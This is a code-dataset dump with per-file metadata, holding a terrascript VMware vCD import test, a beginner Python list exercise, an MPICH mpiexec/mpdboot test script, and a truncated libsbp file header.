| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
98ca6237d635289ec7dae3470f8d63fd2ce810a1
| 7,563
|
py
|
Python
|
tests/test_provider_vmware_vcd.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
tests/test_provider_vmware_vcd.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
tests/test_provider_vmware_vcd.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# tests/test_provider_vmware_vcd.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:30:19 UTC)
def test_provider_import():
import terrascript.provider.vmware.vcd
def test_resource_import():
from terrascript.resource.vmware.vcd import vcd_catalog
from terrascript.resource.vmware.vcd import vcd_catalog_item
from terrascript.resource.vmware.vcd import vcd_catalog_media
from terrascript.resource.vmware.vcd import vcd_edgegateway
from terrascript.resource.vmware.vcd import vcd_edgegateway_settings
from terrascript.resource.vmware.vcd import vcd_edgegateway_vpn
from terrascript.resource.vmware.vcd import vcd_external_network
from terrascript.resource.vmware.vcd import vcd_external_network_v2
from terrascript.resource.vmware.vcd import vcd_global_role
from terrascript.resource.vmware.vcd import vcd_independent_disk
from terrascript.resource.vmware.vcd import vcd_inserted_media
from terrascript.resource.vmware.vcd import vcd_lb_app_profile
from terrascript.resource.vmware.vcd import vcd_lb_app_rule
from terrascript.resource.vmware.vcd import vcd_lb_server_pool
from terrascript.resource.vmware.vcd import vcd_lb_service_monitor
from terrascript.resource.vmware.vcd import vcd_lb_virtual_server
from terrascript.resource.vmware.vcd import vcd_network_direct
from terrascript.resource.vmware.vcd import vcd_network_isolated
from terrascript.resource.vmware.vcd import vcd_network_isolated_v2
from terrascript.resource.vmware.vcd import vcd_network_routed
from terrascript.resource.vmware.vcd import vcd_network_routed_v2
from terrascript.resource.vmware.vcd import vcd_nsxt_app_port_profile
from terrascript.resource.vmware.vcd import vcd_nsxt_edgegateway
from terrascript.resource.vmware.vcd import vcd_nsxt_firewall
from terrascript.resource.vmware.vcd import vcd_nsxt_ip_set
from terrascript.resource.vmware.vcd import vcd_nsxt_ipsec_vpn_tunnel
from terrascript.resource.vmware.vcd import vcd_nsxt_nat_rule
from terrascript.resource.vmware.vcd import vcd_nsxt_network_dhcp
from terrascript.resource.vmware.vcd import vcd_nsxt_network_imported
from terrascript.resource.vmware.vcd import vcd_nsxt_security_group
from terrascript.resource.vmware.vcd import vcd_nsxv_dhcp_relay
from terrascript.resource.vmware.vcd import vcd_nsxv_dnat
from terrascript.resource.vmware.vcd import vcd_nsxv_firewall_rule
from terrascript.resource.vmware.vcd import vcd_nsxv_ip_set
from terrascript.resource.vmware.vcd import vcd_nsxv_snat
from terrascript.resource.vmware.vcd import vcd_org
from terrascript.resource.vmware.vcd import vcd_org_group
from terrascript.resource.vmware.vcd import vcd_org_user
from terrascript.resource.vmware.vcd import vcd_org_vdc
from terrascript.resource.vmware.vcd import vcd_rights_bundle
from terrascript.resource.vmware.vcd import vcd_role
from terrascript.resource.vmware.vcd import vcd_vapp
from terrascript.resource.vmware.vcd import vcd_vapp_access_control
from terrascript.resource.vmware.vcd import vcd_vapp_firewall_rules
from terrascript.resource.vmware.vcd import vcd_vapp_nat_rules
from terrascript.resource.vmware.vcd import vcd_vapp_network
from terrascript.resource.vmware.vcd import vcd_vapp_org_network
from terrascript.resource.vmware.vcd import vcd_vapp_static_routing
from terrascript.resource.vmware.vcd import vcd_vapp_vm
from terrascript.resource.vmware.vcd import vcd_vm
from terrascript.resource.vmware.vcd import vcd_vm_affinity_rule
from terrascript.resource.vmware.vcd import vcd_vm_internal_disk
from terrascript.resource.vmware.vcd import vcd_vm_sizing_policy
def test_datasource_import():
from terrascript.data.vmware.vcd import vcd_catalog
from terrascript.data.vmware.vcd import vcd_catalog_item
from terrascript.data.vmware.vcd import vcd_catalog_media
from terrascript.data.vmware.vcd import vcd_edgegateway
from terrascript.data.vmware.vcd import vcd_external_network
from terrascript.data.vmware.vcd import vcd_external_network_v2
from terrascript.data.vmware.vcd import vcd_global_role
from terrascript.data.vmware.vcd import vcd_independent_disk
from terrascript.data.vmware.vcd import vcd_lb_app_profile
from terrascript.data.vmware.vcd import vcd_lb_app_rule
from terrascript.data.vmware.vcd import vcd_lb_server_pool
from terrascript.data.vmware.vcd import vcd_lb_service_monitor
from terrascript.data.vmware.vcd import vcd_lb_virtual_server
from terrascript.data.vmware.vcd import vcd_network_direct
from terrascript.data.vmware.vcd import vcd_network_isolated
from terrascript.data.vmware.vcd import vcd_network_isolated_v2
from terrascript.data.vmware.vcd import vcd_network_routed
from terrascript.data.vmware.vcd import vcd_network_routed_v2
from terrascript.data.vmware.vcd import vcd_nsxt_app_port_profile
from terrascript.data.vmware.vcd import vcd_nsxt_edge_cluster
from terrascript.data.vmware.vcd import vcd_nsxt_edgegateway
from terrascript.data.vmware.vcd import vcd_nsxt_firewall
from terrascript.data.vmware.vcd import vcd_nsxt_ip_set
from terrascript.data.vmware.vcd import vcd_nsxt_ipsec_vpn_tunnel
from terrascript.data.vmware.vcd import vcd_nsxt_manager
from terrascript.data.vmware.vcd import vcd_nsxt_nat_rule
from terrascript.data.vmware.vcd import vcd_nsxt_network_dhcp
from terrascript.data.vmware.vcd import vcd_nsxt_network_imported
from terrascript.data.vmware.vcd import vcd_nsxt_security_group
from terrascript.data.vmware.vcd import vcd_nsxt_tier0_router
from terrascript.data.vmware.vcd import vcd_nsxv_dhcp_relay
from terrascript.data.vmware.vcd import vcd_nsxv_dnat
from terrascript.data.vmware.vcd import vcd_nsxv_firewall_rule
from terrascript.data.vmware.vcd import vcd_nsxv_ip_set
from terrascript.data.vmware.vcd import vcd_nsxv_snat
from terrascript.data.vmware.vcd import vcd_org
from terrascript.data.vmware.vcd import vcd_org_user
from terrascript.data.vmware.vcd import vcd_org_vdc
from terrascript.data.vmware.vcd import vcd_portgroup
from terrascript.data.vmware.vcd import vcd_resource_list
from terrascript.data.vmware.vcd import vcd_resource_schema
from terrascript.data.vmware.vcd import vcd_right
from terrascript.data.vmware.vcd import vcd_rights_bundle
from terrascript.data.vmware.vcd import vcd_role
from terrascript.data.vmware.vcd import vcd_storage_profile
from terrascript.data.vmware.vcd import vcd_vapp
from terrascript.data.vmware.vcd import vcd_vapp_network
from terrascript.data.vmware.vcd import vcd_vapp_org_network
from terrascript.data.vmware.vcd import vcd_vapp_vm
from terrascript.data.vmware.vcd import vcd_vcenter
from terrascript.data.vmware.vcd import vcd_vm
from terrascript.data.vmware.vcd import vcd_vm_affinity_rule
from terrascript.data.vmware.vcd import vcd_vm_sizing_policy
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.vmware.vcd
#
# t = terrascript.provider.vmware.vcd.vcd()
# s = str(t)
#
# assert 'https://github.com/vmware/terraform-provider-vcd' in s
# assert '3.3.1' in s
| 31.911392
| 80
| 0.80907
| 1,083
| 7,563
| 5.408126
| 0.116343
| 0.169029
| 0.27147
| 0.325764
| 0.912413
| 0.900802
| 0.900802
| 0.87007
| 0.465426
| 0.03483
| 0
| 0.003381
| 0.139759
| 7,563
| 236
| 81
| 32.04661
| 0.896864
| 0.062277
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004237
| 0
| 1
| 0.027273
| true
| 0
| 1
| 0
| 1.027273
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
c710dffcaccb63b2d101a105ab2a3df1e66d9fc6
| 1,671
|
py
|
Python
|
python_02_list/name_list.py
|
lexiaoyuan/PythonCrashCourse
|
9d1c59012d3ae9fdbfc468bbf401f567ce88681b
|
[
"MIT"
] | null | null | null |
python_02_list/name_list.py
|
lexiaoyuan/PythonCrashCourse
|
9d1c59012d3ae9fdbfc468bbf401f567ce88681b
|
[
"MIT"
] | null | null | null |
python_02_list/name_list.py
|
lexiaoyuan/PythonCrashCourse
|
9d1c59012d3ae9fdbfc468bbf401f567ce88681b
|
[
"MIT"
] | null | null | null |
name_lists = ['dad', 'mom', 'yege', 'ruanwei']
print("Invite " + name_lists[0].title() + " to dinner!")
print("Invite " + name_lists[1].title() + " to dinner!")
print("Invite " + name_lists[2].title() + " to dinner!")
print("Invite " + name_lists[3].title() + " to dinner!")
print(name_lists[3].title() + " can't come fot dinner!")
name_lists.remove('ruanwei')
name_lists.append('yangxi')
print("Invite " + name_lists[0].title() + " to dinner!")
print("Invite " + name_lists[1].title() + " to dinner!")
print("Invite " + name_lists[2].title() + " to dinner!")
print("Invite " + name_lists[3].title() + " to dinner!")
print("I found a bigger table")
name_lists.insert(0, 'zhangliangyin')
name_lists.insert(3, 'shuchang')
name_lists.append('zhugedali')
print("Invite " + name_lists[0].title() + " to dinner!")
print("Invite " + name_lists[1].title() + " to dinner!")
print("Invite " + name_lists[2].title() + " to dinner!")
print("Invite " + name_lists[3].title() + " to dinner!")
print("Invite " + name_lists[4].title() + " to dinner!")
print("Invite " + name_lists[5].title() + " to dinner!")
print("Invite " + name_lists[6].title() + " to dinner!")
print("I can only invite two guests")
print("I'm sorry I can't invite " + name_lists.pop().title())
print("I'm sorry I can't invite " + name_lists.pop().title())
print("I'm sorry I can't invite " + name_lists.pop().title())
print("I'm sorry I can't invite " + name_lists.pop().title())
print("I'm sorry I can't invite " + name_lists.pop().title())
print("Invite " + name_lists[0].title() + " to dinner!")
print("Invite " + name_lists[1].title() + " to dinner!")
del name_lists[0]
del name_lists[0]
print(name_lists)
| 41.775
| 61
| 0.648713
| 258
| 1,671
| 4.077519
| 0.158915
| 0.273764
| 0.313688
| 0.323194
| 0.752852
| 0.73384
| 0.73384
| 0.656844
| 0.656844
| 0.656844
| 0
| 0.015131
| 0.129862
| 1,671
| 39
| 62
| 42.846154
| 0.708391
| 0
| 0
| 0.617647
| 0
| 0
| 0.337522
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.764706
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c75d3dbb080f40396cd4339270c6d6f7e6137de6
| 14,505
|
py
|
Python
|
src/pm/mpd/test/test2.py
|
raffenet/mpich-CVS
|
2d33e2742e8c00db4f56a373fea051cc6c0ee0d0
|
[
"mpich2"
] | 1
|
2021-11-11T15:42:30.000Z
|
2021-11-11T15:42:30.000Z
|
src/pm/mpd/test/test2.py
|
grondo/mvapich2-cce
|
ec084d8e07db1cf2ac1352ee4c604ae7dbae55cb
|
[
"Intel",
"mpich2",
"Unlicense"
] | null | null | null |
src/pm/mpd/test/test2.py
|
grondo/mvapich2-cce
|
ec084d8e07db1cf2ac1352ee4c604ae7dbae55cb
|
[
"Intel",
"mpich2",
"Unlicense"
] | null | null | null |
#!/usr/bin/env python
# (C) 2001 by Argonne National Laboratory.
# See COPYRIGHT in top-level directory.
#
# Note that I repeat code for each test just in case I want to
# run one separately. I can simply copy it out of here and run it.
# A single test can typically be chgd simply by altering its value(s)
# for one or more of:
# PYEXT, NMPDS, HFILE
import os, sys, commands
sys.path += [os.getcwd()] # do this once
print "mpiexec tests-------------------------------------------"
clusterHosts = [ 'bp4%02d' % (i) for i in range(0,8) ]
print "clusterHosts=", clusterHosts
# test:
print "TEST -machinefile"
PYEXT = '.py'
NMPDS = 4
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
tempm = open('tempm','w')
for host in clusterHosts: print >>tempm, '%s:2 ifhn=%s' % (host,host)
tempm.close()
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '0: bp400\n1: bp400\n2: bp401\n3: bp401\n' # 2 per host because of :2's in tempm
mpdtest.run(cmd="mpiexec%s -l -machinefile %s -n 4 hostname" % (PYEXT,'tempm'), chkOut=1, expOut=expout)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -file"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
tempfilename = '/tmp/%s_tempin2' % (os.environ['USER'])
f = open(tempfilename,'w')
print >>f, """
<create-process-group totalprocs='3'>
<process-spec
range='0-2'
exec='/bin/echo'>
<arg idx='1' value="hello"> </arg>
<arg idx='2' value="again"> </arg>
</process-spec>
</create-process-group>
"""
f.close()
expout = 'hello again\nhello again\nhello again\n'
mpdtest.run(cmd="mpiexec%s -file %s" % (PYEXT,tempfilename),chkOut=1,expOut=expout)
os.unlink(tempfilename)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -configfile"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
tempfilename = '/tmp/%s_tempin2' % (os.environ['USER'])
f = open(tempfilename,'w')
print >>f, "-l\n-n 1 echo hello there\n-n 1 echo hello again"
f.close()
expout = '0: hello there\n1: hello again\n'
mpdtest.run(cmd="mpiexec%s -configfile %s" % (PYEXT,tempfilename),chkOut=1,expOut=expout)
os.unlink(tempfilename)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -l"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '0: hello\n1: bye\n'
mpdtest.run(cmd="mpiexec%s -l -n 1 echo hello : -n 1 echo bye" % (PYEXT),chkOut=1,expOut=expout)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -m"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '0-1: hello\n'
mpdtest.run(cmd="mpiexec%s -m -n 2 echo hello" % (PYEXT),chkOut=1,expOut=expout)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -ecfn"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = 'hello\n'
rv = mpdtest.run(cmd="mpiexec%s -ecfn tempxout -n 1 echo hello" % (PYEXT),chkOut=1,expOut=expout)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
linesAsStr = commands.getoutput("cat tempxout")
os.unlink("tempxout")
if linesAsStr.find('exit-codes') < 0:
print "ecfn: Failed to create correct contents of xml file:"
print linesAsStr
sys.exit(-1)
# test:
print "TEST -s"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -n 1" % (PYEXT) )
expin = 'hello\n'
expout = '0: hello\n'
rv = mpdtest.run(cmd="mpiexec%s -l -n 4 cat -" % (PYEXT),
expOut=expout,chkOut=1,expIn=expin)
expout = '0: hello\n1: hello\n2: hello\n3: hello\n'
rv = mpdtest.run(cmd="mpiexec%s -l -s 0-3 -n 4 cat -" % (PYEXT),
expOut=expout,chkOut=1,expIn=expin)
expout = '0: hello\n1: hello\n2: hello\n3: hello\n'
rv = mpdtest.run(cmd="mpiexec%s -l -s all -n 4 cat -" % (PYEXT),
expOut=expout,chkOut=1,expIn=expin)
expout = '0: hello\n2: hello\n3: hello\n'
rv = mpdtest.run(cmd="mpiexec%s -l -s 0,2-3 -n 4 cat -" % (PYEXT),
expOut=expout,chkOut=1,expIn=expin)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -1"
PYEXT = '.py'
NMPDS = 2
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '%s\n' % (clusterHosts[0])
rv = mpdtest.run(cmd="mpiexec%s -1 -n 1 /bin/hostname" % (PYEXT), expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -ifhn"
# not a particularly good test; you can hang/fail with an invalid ifhn
# ifhn is not very useful for mpiexec since mpd can fill it in as needed
PYEXT = '.py'
NMPDS = 2
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = 'hello\n'
rv = mpdtest.run(cmd="mpiexec%s -ifhn 127.0.0.1 -n 1 /bin/echo hello" % (PYEXT),
expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -n"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '0: hello\n1: bye\n'
mpdtest.run(cmd="mpiexec%s -l -n 1 echo hello : -n 1 echo bye" % (PYEXT),chkOut=1,expOut=expout)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -wdir"
# not a particularly good test; you can hang/fail with an invalid ifhn
# ifhn is not very useful for mpiexec since mpd can fill it in as needed
PYEXT = '.py'
NMPDS = 2
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '/tmp\n/tmp\n'
rv = mpdtest.run(cmd="mpiexec%s -wdir /tmp -n 2 /bin/pwd" % (PYEXT),
expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -path"
# not a particularly good test; you can hang/fail with an invalid ifhn
# ifhn is not very useful for mpiexec since mpd can fill it in as needed
PYEXT = '.py'
NMPDS = 2
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '/tmp:/bin\n/tmp:/bin\n'
mpdtest.run(cmd="mpiexec%s -path /tmp:/bin -n 2 sh -c '/bin/echo $PATH'" % (PYEXT),
expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -host"
# not a particularly good test; you can hang/fail with an invalid ifhn
# ifhn is not very useful for mpiexec since mpd can fill it in as needed
PYEXT = '.py'
NMPDS = 5
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '%s\n' % clusterHosts[3]
rv = mpdtest.run(cmd="mpiexec%s -n 1 -host %s /bin/hostname" % (PYEXT,clusterHosts[3]),
expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -soft"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = 'hello\nhello\nhello\nhello\nhello\n' # 5 times
rv = mpdtest.run(cmd="mpiexec%s -n 9 -soft 1:5:2 /bin/echo hello" % (PYEXT),
expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -envall (the default)"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = 'BAR\n'
os.environ['FOO'] = 'BAR'
rv = mpdtest.run(cmd="mpiexec%s -n 1 -envall sh -c '/bin/echo $FOO'" % (PYEXT),
expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -envnone"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '\n'
os.environ['FOO'] = ''
rv = mpdtest.run(cmd="mpiexec%s -n 1 -envnone sh -c '/bin/echo $FOO'" % (PYEXT),
expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -env"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = 'BAR\n'
rv = mpdtest.run(cmd="mpiexec%s -n 1 -env FOO BAR sh -c '/bin/echo $FOO'" % (PYEXT),
expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -envlist"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
os.environ['FOO'] = 'BAR'
os.environ['RMB'] = 'ZZZ'
expout = 'BAR ZZZ\n'
rv = mpdtest.run(cmd="mpiexec%s -n 1 -envlist FOO,RMB sh -c '/bin/echo $FOO $RMB'" % (PYEXT),
expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -gn"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = 'hello\nhello\nbye\nbye\n'
rv = mpdtest.run(cmd="mpiexec%s -gn 2 /bin/echo hello : /bin/echo bye" % (PYEXT),
expOut=expout,chkOut=1)
rv = mpdtest.run(cmd="mpiexec%s -gn 2 : /bin/echo hello : /bin/echo bye" % (PYEXT),
expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -gexec"
PYEXT = '.py'
NMPDS = 2
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '%s\n%s\n' % (socket.gethostname(),clusterHosts[0])
rv = mpdtest.run(cmd="mpiexec%s -gexec hostname : -n 1 : -n 1" % (PYEXT),
expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST -genvlist"
PYEXT = '.py'
NMPDS = 2
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
os.environ['FOO'] = 'BAR'
os.environ['RMB'] = 'ZZZ'
expout = 'BAR ZZZ\n'
rv = mpdtest.run(cmd="mpiexec%s -genvlist FOO,RMB : sh -c '/bin/echo $FOO $RMB'" % (PYEXT),
expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
| 32.816742
| 104
| 0.653568
| 2,373
| 14,505
| 3.976401
| 0.079646
| 0.062315
| 0.080119
| 0.08457
| 0.858944
| 0.856401
| 0.846545
| 0.83563
| 0.821323
| 0.810301
| 0
| 0.020039
| 0.160565
| 14,505
| 441
| 105
| 32.891156
| 0.754928
| 0.075147
| 0
| 0.76781
| 0
| 0.007916
| 0.359952
| 0.012936
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.113456
| null | null | 0.110818
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c7840482a2f07a89cf16d278196da0a465a115b4
| 80,174
|
py
|
Python
|
python/sbp/jit/navigation.py
|
adammacudzinski/libsbp
|
33f82210ff1262f8d6c180215277a0bb5eb3b65c
|
[
"MIT"
] | null | null | null |
python/sbp/jit/navigation.py
|
